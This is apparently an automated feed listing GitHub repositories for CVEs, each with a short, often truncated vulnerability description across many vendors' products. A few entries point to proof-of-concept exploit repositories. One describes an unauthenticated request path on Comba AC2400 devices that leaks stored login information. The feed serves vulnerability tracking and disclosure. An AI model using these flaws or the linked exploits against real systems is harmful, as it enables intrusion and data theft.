**An exploitable permanent denial of service vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the kind of firmware image that is going to be installed and thus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3834](https://github.com/Live-Hack-CVE/CVE-2018-3834) create time: 2023-02-03T19:54:25Z

**An exploitable command injection vulnerability exists in the gplotMakeOutput function of Leptonica 1.74.4. A specially crafted gplot rootname argument can cause a command injection resulting in arbitrary code execution. An attacker can provide a malicious path as input to an application that passes attacker data to thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3836](https://github.com/Live-Hack-CVE/CVE-2018-3836) create time: 2023-02-03T19:54:14Z

**A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3861](https://github.com/Live-Hack-CVE/CVE-2018-3861) create time: 2023-02-03T19:54:07Z

**On versions 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.2, 12.1.0-12.1.4.1, and 11.5.2-11.6.4, an attacker sending specifically crafted DHCPv6 requests through a BIG-IP virtual server configured with a DHCPv6 profile may be able to cause the TMM process to produce a core file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6643](https://github.com/Live-Hack-CVE/CVE-2019-6643) create time: 2023-02-03T19:54:36Z

**On version 1.9.0, If DEBUG logging is enable, F5 Container Ingress Service (CIS) for Kubernetes and Red Hat OpenShift (k8s-bigip-ctlr) log files may contain BIG-IP secrets such as SSL Private Keys and Private key Passphrases as provided as inputs by an AS3 Declaration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6648](https://github.com/Live-Hack-CVE/CVE-2019-6648) create time: 2023-02-03T19:54:33Z

**IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 157015. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4070](https://github.com/Live-Hack-CVE/CVE-2019-4070) create time: 2023-02-03T19:54:17Z

**IBM Tivoli Netcool/Impact 7.1.0 allows for remote execution of command by low privileged User. Remote code execution allow to execute arbitrary code on system which lead to take control over the system. IBM X-Force ID: 158094. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4103](https://github.com/Live-Hack-CVE/CVE-2019-4103) create time: 2023-02-03T19:54:10Z

**IBM i2 Intelligent Analyis Platform 9.0.0 through 9.1.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 157007. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4062](https://github.com/Live-Hack-CVE/CVE-2019-4062) create time: 2023-02-03T19:54:00Z

**IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 157012. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4067](https://github.com/Live-Hack-CVE/CVE-2019-4067) create time: 2023-02-03T19:53:51Z

**IBM Sterling B2B Integrator 5.2.0.1 through 6.0.0.0 Standard Edition could allow highly sensitive information to be transmitted in plain text. An attacker could obtain this information using man in the middle techniques. IBM X-ForceID: 157008. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4063](https://github.com/Live-Hack-CVE/CVE-2019-4063) create time: 2023-02-03T19:53:35Z

**IBM API Connect 2018.1 and 2018.4.1.2 apis can be leveraged by unauthenticated users to discover login ids of registered users. IBM X-Force ID: 156544. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4052](https://github.com/Live-Hack-CVE/CVE-2019-4052) create time: 2023-02-03T19:53:31Z

**IBM WebSphere Application Server Admin Console 7.5, 8.0, 8.5, and 9.0 is vulnerable to a potential denial of service, caused by improper parameter parsing. A remote attacker could exploit this to consume all available CPU resources. IBM X-Force ID: 157380. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4080](https://github.com/Live-Hack-CVE/CVE-2019-4080) create time: 2023-02-03T19:53:27Z

**A vulnerability in EbmlTypeDispatcher::send in VideoLAN VLC media player 3.0.11 allows attackers to trigger a heap-based buffer overflow via a crafted .mkv file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26664](https://github.com/Live-Hack-CVE/CVE-2020-26664) create time: 2023-02-03T19:54:03Z

**HTSlib through 1.10.2 allows out-of-bounds write access in vcf_parse_format (called from vcf_parse and vcf_read). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36403](https://github.com/Live-Hack-CVE/CVE-2020-36403) create time: 2023-02-03T19:53:56Z

**GitLab CE/EE version 13.3 prior to 13.3.4 was vulnerable to an OAuth authorization scope change without user consent in the middle of the authorization flow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13300](https://github.com/Live-Hack-CVE/CVE-2020-13300) create time: 2023-02-03T19:53:46Z

**SKYWORTH GN542VF Boa version 0.94.13 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26732](https://github.com/Live-Hack-CVE/CVE-2020-26732) create time: 2023-02-03T19:53:43Z

**Squid through 4.14 and 5.x through 5.0.5, in some configurations, allows information disclosure because of an out-of-bounds read in WCCP protocol data. This can be leveraged as part of a chain for remote code execution as nobody. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28116](https://github.com/Live-Hack-CVE/CVE-2021-28116) create time: 2023-02-03T19:53:39Z

**no description** : [agathanon/cve-2023-44268](https://github.com/agathanon/cve-2023-44268) create time: 2023-02-03T19:02:27Z

**qemu/qemu_driver.c in libvirt before 6.0.0 mishandles the holding of a monitor job during a query to a guest agent, which allows attackers to cause a denial of service (API blockage). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20485](https://github.com/Live-Hack-CVE/CVE-2019-20485) create time: 2023-02-03T17:42:29Z

**Comba AC2400 devices are prone to password disclosure via a simple crafted /09/business/upgrade/upcfgAction.php?download=true request to the web management server. The request doesn't require any authentication and will lead to saving the DBconfig.cfg file. At the end of the file, the login information is stored in cle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15654](https://github.com/Live-Hack-CVE/CVE-2019-15654) create time: 2023-02-03T17:42:19Z

**In cdev_get of char_dev.c, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-153467744 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0305](https://github.com/Live-Hack-CVE/CVE-2020-0305) create time: 2023-02-03T17:42:53Z

**In GNOME Balsa before 2.6.0, a malicious server operator or man in the middle can trigger a NULL pointer dereference and client crash by sending a PREAUTH response to imap_mbox_connect in libbalsa/imap/imap-handle.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16118](https://github.com/Live-Hack-CVE/CVE-2020-16118) create time: 2023-02-03T17:42:49Z

**A flaw was found in the way xserver memory was not properly initialized. This could leak parts of server memory to the X client. In cases where Xorg server runs with elevated privileges, this could result in possible ASLR bypass. Xorg-server before version 1.20.9 is vulnerable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14347](https://github.com/Live-Hack-CVE/CVE-2020-14347) create time: 2023-02-03T17:42:42Z

**The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10675](https://github.com/Live-Hack-CVE/CVE-2020-10675) create time: 2023-02-03T17:42:34Z

**In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks. The issue is fixed in versions 6.0.2.2 and 5.2.4.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5267](https://github.com/Live-Hack-CVE/CVE-2020-5267) create time: 2023-02-03T17:42:23Z

**Huawei smartphone OxfordS-AN00A with versions earlier than 10.0.1.152D(C735E152R3P3),versions earlier than 10.0.1.160(C00E160R4P1) have an improper authentication vulnerability. Authentication to target component is improper when device performs an operation. Attackers exploit this vulnerability to obtain some informat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1878](https://github.com/Live-Hack-CVE/CVE-2020-1878) create time: 2023-02-03T17:42:15Z

**Insecure direct object references (IDOR) in the web server of Biltema IP and Baby Camera Software v124 allows attackers to access sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34138](https://github.com/Live-Hack-CVE/CVE-2022-34138) create time: 2023-02-03T17:42:56Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40998](https://github.com/Live-Hack-CVE/CVE-2022-40998) create time: 2023-02-03T17:42:38Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the NTPSyncWithHost function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24138](https://github.com/Live-Hack-CVE/CVE-2023-24138) create time: 2023-02-03T17:43:00Z

**A null-pointer dereference vulnerability was found in libtirpc before version 0.3.3-rc3. The return value of makefd_xprt() was not checked in all instances, which could lead to a crash when the server exhausted the maximum number of available file descriptors. A remote attacker could cause an rpc-based application to c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14622](https://github.com/Live-Hack-CVE/CVE-2018-14622) create time: 2023-02-03T15:30:28Z

**A Bleichenbacher type side-channel based padding oracle attack was found in the way nettle handles endian conversion of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run a process on the same physical core as the victim process, could use this flaw extract plaintext or in some cases downgrade any TLS conne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16869](https://github.com/Live-Hack-CVE/CVE-2018-16869) create time: 2023-02-03T15:30:23Z

**A vulnerability was found in postgresql versions 11.x prior to 11.3. Using a purpose-crafted insert to a partitioned table, an attacker can read arbitrary bytes of server memory. In the default configuration, any user can create a partitioned table suitable for this attack. (Exploit prerequisites are the same as for CV CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10129](https://github.com/Live-Hack-CVE/CVE-2019-10129) create time: 2023-02-03T15:30:19Z

**A Vulnerability has been found in PowerDNS Authoritative Server before versions 4.1.9, 4.0.8 allowing a remote, authorized master server to cause a high CPU load or even prevent any further updates to any slave zone by sending a large number of NOTIFY messages. Note that only servers configured as slaves are affected b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10163](https://github.com/Live-Hack-CVE/CVE-2019-10163) create time: 2023-02-03T15:30:15Z

**A SQL injection vulnerability in the reporting component of Avaya Control Manager could allow an unauthenticated attacker to execute arbitrary SQL commands and retrieve sensitive data related to other users on the system. Affected versions of Avaya Control Manager include 7.x and 8.0.x versions prior to 8.0.4.0. Unsupp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7003](https://github.com/Live-Hack-CVE/CVE-2019-7003) create time: 2023-02-03T15:30:11Z

**IBM QRadar SIEM 7.3.2 could allow a user to bypass authentication exposing certain functionality which could lead to information disclosure or modification of application configuration. IBM X-Force ID: 158986. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4210](https://github.com/Live-Hack-CVE/CVE-2019-4210) create time: 2023-02-03T15:30:03Z

**Apport before versions 2.14.1-0ubuntu3.29+esm1, 2.20.1-0ubuntu2.19, 2.20.9-0ubuntu7.7, 2.20.10-0ubuntu27.1, 2.20.11-0ubuntu5 contained a TOCTTOU vulnerability when reading the users ~/.apport-ignore.xml file, which allows a local attacker to replace this file with a symlink to any other file on the system and so cause CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7307](https://github.com/Live-Hack-CVE/CVE-2019-7307) create time: 2023-02-03T15:29:59Z

**IBM TRIRIGA Application Platform 3.5.3 and 3.6.0 may disclose sensitive information only available to a local user that could be used in further attacks against the system. IBM X-Force ID: 159148. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4207](https://github.com/Live-Hack-CVE/CVE-2019-4207) create time: 2023-02-03T15:29:42Z

**IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 159464. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4238](https://github.com/Live-Hack-CVE/CVE-2019-4238) create time: 2023-02-03T15:29:38Z

**IBM InfoSphere Information Server 11.7.1.0 stores a common hard coded encryption key that could be used to decrypt sensitive information. IBM X-Force ID: 159229. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4220](https://github.com/Live-Hack-CVE/CVE-2019-4220) create time: 2023-02-03T15:29:34Z

**IBM TRIRIGA Application Platform 3.5.3 and 3.6.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 159129. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4208](https://github.com/Live-Hack-CVE/CVE-2019-4208) create time: 2023-02-03T15:29:31Z

**Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1 allows stored XSS in the URL Widget. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15803](https://github.com/Live-Hack-CVE/CVE-2020-15803) create time: 2023-02-03T15:29:55Z

**IBM Power9 (AIX 7.1, 7.2, and VIOS 3.1) processors could allow a local user to obtain sensitive information from the data in the L1 cache under extenuating circumstances. IBM X-Force ID: 189296. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4788](https://github.com/Live-Hack-CVE/CVE-2020-4788) create time: 2023-02-03T15:29:23Z

**The Leaflet Map WordPress plugin before 3.0.0 does not verify the CSRF nonce when saving its settings, which allows attackers to make a logged in admin update the settings via a Cross-Site Request Forgery attack. This could lead to Cross-Site Scripting issues by either changing the URL of the JavaScript library being u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24467](https://github.com/Live-Hack-CVE/CVE-2021-24467) create time: 2023-02-03T15:30:34Z

**An information disclosure vulnerability exists in the ARM SIGPAGE functionality of Linux Kernel v5.4.66 and v5.4.54. The latest version (5.11-rc4) seems to still be vulnerable. A userland application can read the contents of the sigpage, which can leak kernel memory contents. An attacker can read a process’s memory at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21781](https://github.com/Live-Hack-CVE/CVE-2021-21781) create time: 2023-02-03T15:30:07Z

**Jenkins Kubernetes Credentials Provider Plugin 1.208.v128ee9800c04 and earlier does not set the appropriate context for Kubernetes credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Kubernetes credentials they are not entitled to. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24425](https://github.com/Live-Hack-CVE/CVE-2023-24425) create time: 2023-02-03T15:29:52Z

**Jenkins Azure AD Plugin 303.va_91ef20ee49f and earlier does not invalidate the previous session on login. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24426](https://github.com/Live-Hack-CVE/CVE-2023-24426) create time: 2023-02-03T15:29:48Z

**A vulnerability, which was classified as problematic, has been found in YAFNET up to 3.1.10. This issue affects some unknown processing of the file /forum/PostPrivateMessage of the component Private Message Handler. The manipulation of the argument subject/message leads to cross site scripting. The attack may be initia CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0549](https://github.com/Live-Hack-CVE/CVE-2023-0549) create time: 2023-02-03T13:16:28Z

**An issue in NoMachine before v8.2.3 allows attackers to execute arbitrary commands via a crafted .nxs file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48074](https://github.com/Live-Hack-CVE/CVE-2022-48074) create time: 2023-02-03T12:07:48Z

**io_uring use work_flags to determine which identity need to grab from the calling process to make sure it is consistent with the calling process when executing IORING_OP. Some operations are missing some types, which can lead to incorrect reference counts which can then lead to a double free. We recommend upgrading the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2327](https://github.com/Live-Hack-CVE/CVE-2022-2327) create time: 2023-02-03T12:07:36Z

**An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image in Image Magic.** : [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc) create time: 2023-02-03T11:33:27Z

**sprintf in the GNU C Library (glibc) 2.37 has a buffer overflow (out-of-bounds write) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25139](https://github.com/Live-Hack-CVE/CVE-2023-25139) create time: 2023-02-03T12:07:56Z

**OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be triggered by an unauthenticated attacker in the default configuration; however, the vulnerability discoverer reports that "exploiting this vulnerability will not CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25136](https://github.com/Live-Hack-CVE/CVE-2023-25136) create time: 2023-02-03T12:07:52Z

**** DISPUTED ** Connectwise Automate 2022.11 is vulnerable to Cleartext authentication. Authentication is being done via HTTP (cleartext) with SSL disabled. OTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during tr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23130](https://github.com/Live-Hack-CVE/CVE-2023-23130) create time: 2023-02-03T12:07:44Z

**** DISPUTED ** Connectwise Automate 2022.11 is vulnerable to Clickjacking. The login screen can be iframed and used to manipulate users to perform unintended actions. NOTE: the vendor's position is that a Content-Security-Policy HTTP response header is present to block this attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23126](https://github.com/Live-Hack-CVE/CVE-2023-23126) create time: 2023-02-03T12:07:40Z

**Responsive FileManager v.9.9.5 vulnerable to CVE-2022–46604.** : [galoget/ResponsiveFileManager-CVE-2022-46604](https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604) create time: 2023-02-03T08:56:16Z

**CVE-2022-31144 dos pt redis, not finished yet or too soon, this can be turned into rce but oh well if you smart enough** : [SpiralBL0CK/CVE-2022-31144](https://github.com/SpiralBL0CK/CVE-2022-31144) create time: 2023-02-03T08:40:38Z

**The vulnerable recurrence docker environment for CVE-2022-44268** : [y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment](https://github.com/y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment) create time: 2023-02-03T08:02:28Z

**A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3868](https://github.com/Live-Hack-CVE/CVE-2018-3868) create time: 2023-02-03T06:37:21Z

**An exploitable buffer overflow vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250-Firmware version 0.20.17. The strncpy overflows the destination buffer, which has a size of 64 bytes. An attacker can send an arbitrarily long "bucket" value in order to expl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3876](https://github.com/Live-Hack-CVE/CVE-2018-3876) create time: 2023-02-03T06:37:17Z

**A path traversal vulnerability in <= v0.2.6 of http-file-server npm module allows attackers to list files in arbitrary folders. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5447](https://github.com/Live-Hack-CVE/CVE-2019-5447) create time: 2023-02-03T06:37:59Z

**SQL Injection in the Nextcloud Android app prior to version 3.0.0 allows to destroy a local cache when a harmful query is executed requiring to resetup the account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5454](https://github.com/Live-Hack-CVE/CVE-2019-5454) create time: 2023-02-03T06:37:43Z

**In Dovecot before 2.3.11.3, sending a specially formatted NTLM request will crash the auth service because of an out-of-bounds read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12673](https://github.com/Live-Hack-CVE/CVE-2020-12673) create time: 2023-02-03T06:37:54Z

**In Dovecot before 2.3.11.3, sending a specially formatted RPA request will crash the auth service because a length of zero is mishandled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12674](https://github.com/Live-Hack-CVE/CVE-2020-12674) create time: 2023-02-03T06:37:50Z

**** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Site Scripting (XSS) vulnerability was found in Codiad v1.7.8 and later. The vulnerability occurs because of improper sanitization of the folder's name $path variable in components/filemanager/class.filemanager.php. NOTE: the vendor states "Codiad is no longer under act CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14042](https://github.com/Live-Hack-CVE/CVE-2020-14042) create time: 2023-02-03T06:37:47Z

**A NULL pointer dereference, or possible use-after-free flaw was found in Samba AD LDAP server in versions before 4.10.17, before 4.11.11 and before 4.12.4. Although some versions of Samba shipped with Red Hat Enterprise Linux do not support Samba in AD mode, the affected code is shipped with the libldb package. This fl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10730](https://github.com/Live-Hack-CVE/CVE-2020-10730) create time: 2023-02-03T06:37:40Z

**A user authorized to perform database queries may cause denial of service by issuing specially crafted queries, which violate an invariant in the query subsystem's support for geoNear. This issue affects: MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.0-rc7; v4.2 versions prior to 4.2.8; v4.0 versions prior to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7923](https://github.com/Live-Hack-CVE/CVE-2020-7923) create time: 2023-02-03T06:37:37Z

**Go before 1.13.15 and 14.x before 1.14.7 can have an infinite read loop in ReadUvarint and ReadVarint in encoding/binary via invalid inputs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16845](https://github.com/Live-Hack-CVE/CVE-2020-16845) create time: 2023-02-03T06:37:33Z

**A vulnerability has been identified in Camstar Enterprise Platform (All versions), Opcenter Execution Core (All versions < V8.2), Opcenter Execution Core (V8.2). An authenticated user with the ability to create containers, packages or register defects could perform stored Cross-Site Scripting (XSS) attacks within the v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7576](https://github.com/Live-Hack-CVE/CVE-2020-7576) create time: 2023-02-03T06:37:30Z

**HashiCorp Vault and Vault Enterprise versions 0.8.3 and newer, when configured with the GCP GCE auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16251](https://github.com/Live-Hack-CVE/CVE-2020-16251) create time: 2023-02-03T06:37:26Z

**All versions prior to Delta Electronic’s CNCSoft version 1.01.34 (running ScreenEditor versions 1.01.5 and prior) are vulnerable to a stack-based buffer overflow, which could allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4634](https://github.com/Live-Hack-CVE/CVE-2022-4634) create time: 2023-02-03T06:36:56Z

**Aspera Faspex Pre Auth RCE** : [ohnonoyesyes/CVE-2022-47986](https://github.com/ohnonoyesyes/CVE-2022-47986) create time: 2023-02-03T06:32:13Z

**The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes TRENDnet TV-IP651WI Network Camera firmware version v1.07.01 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-the-middle (MITM) attack to modify the new firmware image and byp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23120](https://github.com/Live-Hack-CVE/CVE-2023-23120) create time: 2023-02-03T06:37:11Z

**The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes Ubiquiti airFiber AF2X Radio firmware version 3.2.2 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-the-middle (MITM) attack to modify the new firmware image and bypass the c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23119](https://github.com/Live-Hack-CVE/CVE-2023-23119) create time: 2023-02-03T06:37:07Z

**Delta Electronics DOPSoft versions 4.00.16.22 and prior are vulnerable to an out-of-bounds write, which could allow an attacker to remotely execute arbitrary code when a malformed file is introduced to the software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0124](https://github.com/Live-Hack-CVE/CVE-2023-0124) create time: 2023-02-03T06:37:03Z

**Delta Electronics DOPSoft versions 4.00.16.22 and prior are vulnerable to a stack-based buffer overflow, which could allow an attacker to remotely execute arbitrary code when a malformed file is introduced to the software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0123](https://github.com/Live-Hack-CVE/CVE-2023-0123) create time: 2023-02-03T06:37:00Z

**vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. The fixed versions are 5.6.7 PL1, 5.6.8 PL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25135](https://github.com/Live-Hack-CVE/CVE-2023-25135) create time: 2023-02-03T06:36:50Z

**IBM Tivoli Workload Scheduler 9.4, 9.5, and 10.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 233975. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38389](https://github.com/Live-Hack-CVE/CVE-2022-38389) create time: 2023-02-03T02:06:06Z

**IBM Tivoli Workload Scheduler 9.4, 9.5, and 10.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 226328. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22486](https://github.com/Live-Hack-CVE/CVE-2022-22486) create time: 2023-02-03T02:06:03Z

**An uncontrolled process operation was found in the newgrp command provided by the shadow-utils package. This issue could cause the execution of arbitrary code provided by a user when running the newgrp command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0634](https://github.com/Live-Hack-CVE/CVE-2023-0634) create time: 2023-02-03T02:06:16Z

**A vulnerability, which was classified as critical, was found in Multilaser RE057 and RE170 2.1/2.2. This affects an unknown part of the file /param.file.tgz of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-220053 w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0658](https://github.com/Live-Hack-CVE/CVE-2023-0658) create time: 2023-02-03T02:06:10Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.2.0.9297. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3993](https://github.com/Live-Hack-CVE/CVE-2018-3993) create time: 2023-02-02T23:55:56Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.2.0.9297. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3995](https://github.com/Live-Hack-CVE/CVE-2018-3995) create time: 2023-02-02T23:55:53Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.2.0.9297. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3994](https://github.com/Live-Hack-CVE/CVE-2018-3994) create time: 2023-02-02T23:55:49Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.2.0.9297. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3996](https://github.com/Live-Hack-CVE/CVE-2018-3996) create time: 2023-02-02T23:55:46Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3946](https://github.com/Live-Hack-CVE/CVE-2018-3946) create time: 2023-02-02T23:55:42Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3945](https://github.com/Live-Hack-CVE/CVE-2018-3945) create time: 2023-02-02T23:55:38Z

